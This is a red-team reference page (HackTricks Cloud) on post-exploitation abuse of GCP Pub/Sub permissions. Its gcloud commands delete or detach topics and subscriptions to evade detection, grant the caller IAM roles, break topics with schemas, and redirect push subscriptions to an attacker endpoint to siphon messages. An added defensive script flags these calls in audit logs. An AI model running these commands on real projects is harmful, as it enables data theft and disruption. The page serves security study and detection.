GCP - Pub/Sub Post Exploitation
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Pub/Sub
For more information about Pub/Sub check the following page:
pubsub.topics.publish
Publish a message in a topic, useful to send unexpected data and trigger unexpected functionalities or exploit vulnerabilities:
Publish a message in a topic
```bash
# Publish a message in a topic
gcloud pubsub topics publish <TOPIC_NAME> --message "<MESSAGE>"
```
pubsub.topics.detachSubscription
Useful to prevent a subscription from receiving messages, maybe to avoid detection.
Detach subscription from topic
```bash
gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>
```
pubsub.topics.delete
Useful to prevent a subscription from receiving messages, maybe to avoid detection.
It's possible to delete a topic even with subscriptions attached to it.
Delete topic
```bash
gcloud pubsub topics delete <TOPIC_NAME>
```
pubsub.topics.update
Use this permission to update some settings of the topic to disrupt it, like `--clear-schema-settings`, `--message-retention-duration`, `--message-storage-policy-allowed-regions`, `--schema`, `--schema-project`, `--topic-encryption-key`…
pubsub.topics.setIamPolicy
Give yourself permission to perform any of the attacks mentioned above.
```bash
# Add Binding
gcloud pubsub topics add-iam-policy-binding <TOPIC_NAME> \
  --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
  --role="<ROLE_OR_CUSTOM_ROLE>" \
  --project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub topics remove-iam-policy-binding <TOPIC_NAME> \
  --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
  --role="<ROLE_OR_CUSTOM_ROLE>" \
  --project="<PROJECT_ID>"

# Change Policy
gcloud pubsub topics set-iam-policy <TOPIC_NAME> \
  <(echo '{
    "bindings": [
      {
        "role": "<ROLE_OR_CUSTOM_ROLE>",
        "members": [
          "serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
        ]
      }
    ]
  }') \
  --project="<PROJECT_ID>"
```
pubsub.subscriptions.create, pubsub.topics.attachSubscription, (pubsub.subscriptions.consume)
Get all the messages in a web server:
Create a push subscription to receive messages
```bash
# Create push subscription and receive all the messages instantly in your web server
gcloud pubsub subscriptions create <SUBSCRIPTION_NAME> --topic <TOPIC_NAME> --push-endpoint "<PUSH_ENDPOINT_URL>"
```
Create a subscription and use it to pull messages:
Create a pull subscription and receive messages
```bash
# This will retrieve a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <SUBSCRIPTION_NAME> --topic <TOPIC_NAME>

# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
# This command will wait for a message to be posted
```
### `pubsub.subscriptions.delete`
**Deleting a subscription** can be useful to disrupt a log processing system or something similar:
<details>
<summary>Delete subscription</summary>

```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
```

</details>

pubsub.subscriptions.update
Use this permission to update some settings so that messages are stored in a place you can access (URL, BigQuery table, Bucket) or just to disrupt it.
Update subscription endpoint
```bash
gcloud pubsub subscriptions update <SUBSCRIPTION_NAME> --push-endpoint "<PUSH_ENDPOINT_URL>"
```
pubsub.subscriptions.setIamPolicy
Give yourself the permissions needed to perform any of the previously mentioned attacks.
pubsub.schemas.attach, pubsub.topics.update, (pubsub.schemas.create)
Attach a schema to a topic so that the messages don't comply with it, which disrupts the topic.
If there aren't any schemas, you may need to create one.
Create a schema file and attach it to the topic
```json:schema.json
{
  "namespace": "com.example",
  "type": "record",
  "name": "Person",
  "fields": [
    { "name": "name", "type": "string" },
    { "name": "age", "type": "int" }
  ]
}
```
```bash
# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
  --schema=projects/<project-name>/schemas/<topic-id> \
  --message-encoding=json
```
pubsub.schemas.delete
This might look like deleting a schema would let you send messages that don't comply with it. However, since the schema will be deleted, no message will actually enter the topic. So this is USELESS:
Delete schema (not useful)
```bash
gcloud pubsub schemas delete <SCHEMA NAME>
```
pubsub.schemas.setIamPolicy
Give yourself the permissions needed to perform any of the previously mentioned attacks.
pubsub.snapshots.create, pubsub.snapshots.seek
This will create a snapshot of all the unACKed messages and put them back into the subscription. Not very useful for an attacker, but here it is:
Create snapshot and seek
```bash
gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
  --subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
  --snapshot=YOUR_SNAPSHOT_NAME
```
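The topic, subscription, schema and IAM changes listed on this page can be reviewed from Cloud Audit Logs entries for `pubsub.googleapis.com`. The following is an added detection example, not part of the original page: it triages such entries and flags disruptive calls and subscriptions that push to hosts outside an allowlist. The sample entries, the `request` field layout, the allowlist and the helper names are assumptions constructed for illustration.

```python
from urllib.parse import urlparse

P, S = "google.pubsub.v1.Publisher.", "google.pubsub.v1.Subscriber."
DISRUPTIVE = {  # audit-log methodName -> reason, for operations on this page
    P + "DeleteTopic": "topic deleted",
    P + "DetachSubscription": "subscription detached from topic",
    P + "UpdateTopic": "topic settings changed",
    S + "DeleteSubscription": "subscription deleted",
    "google.pubsub.v1.SchemaService.DeleteSchema": "schema deleted",
    "google.iam.v1.IAMPolicy.SetIamPolicy": "IAM policy changed",
}
SUB_WRITES = {S + "CreateSubscription", S + "UpdateSubscription"}

def push_host(payload):  # the request field layout is an assumption of this example
    req = payload.get("request", {})
    url = req.get("subscription", req).get("pushConfig", {}).get("pushEndpoint")
    return urlparse(url).hostname if url else None

def triage(entries, trusted_push_hosts):  # -> [(principal, resource, reason)]
    findings = []
    for entry in entries:
        p = entry.get("protoPayload", {})
        if p.get("serviceName") != "pubsub.googleapis.com":
            continue
        method = p.get("methodName", "")
        who = p.get("authenticationInfo", {}).get("principalEmail", "unknown")
        reason = DISRUPTIVE.get(method)
        if reason is None and method in SUB_WRITES:
            host = push_host(p)
            if host and host not in trusted_push_hosts:
                reason = f"push endpoint not allowlisted: {host}"
            elif not host and method == S + "CreateSubscription":
                reason = "new pull subscription"
        if reason:
            findings.append((who, p.get("resourceName", ""), reason))
    return findings

def mk_entry(method, res, request=None, who="sa-x@example-proj.iam.gserviceaccount.com"):
    return {"protoPayload": {"serviceName": "pubsub.googleapis.com",
            "methodName": method, "resourceName": "projects/example-proj/" + res,
            "request": request or {}, "authenticationInfo": {"principalEmail": who}}}
SAMPLE = [  # constructed entries, not real logs
    mk_entry(S + "CreateSubscription", "subscriptions/s1",
             {"pushConfig": {"pushEndpoint": "https://collector.example.net/hook"}}),
    mk_entry(P + "DetachSubscription", "subscriptions/logs-sink"),
    mk_entry(S + "UpdateSubscription", "subscriptions/s2",
             {"subscription": {"pushConfig": {"pushEndpoint": "https://ingest.example.com/p"}}}),
]
if __name__ == "__main__":
    print(*triage(SAMPLE, {"ingest.example.com"}), sep="\n")
```

In practice the entries would come from a log export filtered on `protoPayload.serviceName="pubsub.googleapis.com"`, and the allowlist would hold the push endpoint hosts your own services use.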

